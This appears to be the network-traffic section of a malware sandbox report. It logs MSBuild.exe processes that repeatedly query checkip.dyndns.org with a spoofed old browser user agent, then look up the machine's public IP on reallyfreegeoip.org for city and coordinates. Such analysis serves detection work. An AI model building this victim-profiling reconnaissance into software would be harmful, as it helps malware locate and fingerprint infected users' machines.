Nov 8, 2024 16:15:27.684966087 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c1961c7eb3b97d472aba27c8934b2ba7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49719	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:28.040829897 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:28.682195902 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3ccba020e309b5452becb25cca0fb454 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 16:15:28.685718060 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:28.831724882 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1723a7f4bdb8430095c78725c661c2ef Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 16:15:30.212970018 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:30.360656023 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 727f3b118969c4a34067c3328d9bfa87 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49720	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:28.453608990 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:29.092767000 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 65cb02959db641a503354e57ec7bd937 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 16:15:29.306257010 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 65cb02959db641a503354e57ec7bd937 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49733	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:30.029519081 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:30.681972027 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 14bc651f773e12d02ca472d109ece0f8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49742	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:31.146456957 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:32.795105934 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 53311c79d17ba4a7a15543396b954eb4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49752	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:32.633635044 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:34.280805111 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10c4df8b421c13037e8364eb847a1bf6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49759	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:33.591073036 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 8, 2024 16:15:35.239767075 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:35 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 16ca983d1eda467947ac0e3236f96579 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49771	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:35.096061945 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:35.749399900 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:35 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4d60a63dc5c8aa5e13ea3911f895b9d3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49779	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:36.015594959 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:36.828397036 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0f6a500a16709a2b45db2df1fb68fa43 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Nov 8, 2024 16:15:36.878201962 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0f6a500a16709a2b45db2df1fb68fa43 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49785	158.101.44.242	80	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:36.544214964 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:37.175915956 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:37 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 98b0c409b0a76064cf5d97de735a9f6a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49794	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:37.603794098 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:38.242852926 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:38 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a2653d4ef6ddabb46f87b7cdd52593ef Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49803	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:39.044595003 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:39.694999933 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4fed2a911fb3556f72afd257439fc006 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49816	158.101.44.242	80	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 16:15:40.472507954 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 8, 2024 16:15:41.121926069 CET	323	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:41 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5464ea78221fe570d3f18af1c02645f1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:25 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-08 15:15:25 UTC	1227	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:25 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31640 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PKShZTGTDnwVveimHbBD0PBbGV4%2F9c%2Fy5woJcA06ncU17jEF5Lk6uaPb%2BZ%2BEwHTE2B1hpu2rdh2RHV5R11hwyHeaYCB4yv5lnRvh7DQJ6Ab%2FC8FAKr%2B1rbwhj1Cm1m%2FXsTy%2BTWMM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684b6ee262cd9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1331494&cwnd=248&unsent_bytes=0&cid=a43f29ccef7a625e&ts=215&x=0"
2024-11-08 15:15:25 UTC	142	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
2024-11-08 15:15:25 UTC	217	IN	Data Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49710	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:26 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:27 UTC	1231	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:26 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31641 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJpbeXcjDK00%2BsVvfXTF61M%2FaSi%2Bn3o%2FE9ef2hVgsB3cXx2TobghWnBLK%2BbmK%2BMTfjumbWiVGrWM%2FJ8WPIxNZI3EDowqK3S81hJtgbz8iJs%2FlsKz%2BQf5j%2BE4VS75QxTP8EV46Kvq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684bd6be14608-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2198&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1275770&cwnd=251&unsent_bytes=0&cid=1f1cf3ac32c8407c&ts=163&x=0"
2024-11-08 15:15:27 UTC	138	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode>
2024-11-08 15:15:27 UTC	221	IN	Data Raw: 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: <RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49715	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

